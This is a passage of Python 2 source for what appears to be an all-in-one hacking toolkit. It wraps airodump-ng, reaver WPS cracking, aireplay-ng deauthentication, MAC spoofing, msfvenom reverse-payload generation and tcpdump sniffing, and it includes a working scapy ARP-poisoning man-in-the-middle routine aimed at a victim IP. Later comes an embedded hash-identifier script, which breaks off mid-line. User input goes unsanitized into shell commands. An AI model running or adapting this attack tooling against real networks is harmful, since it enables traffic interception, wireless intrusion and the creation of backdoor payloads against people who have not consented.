raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False 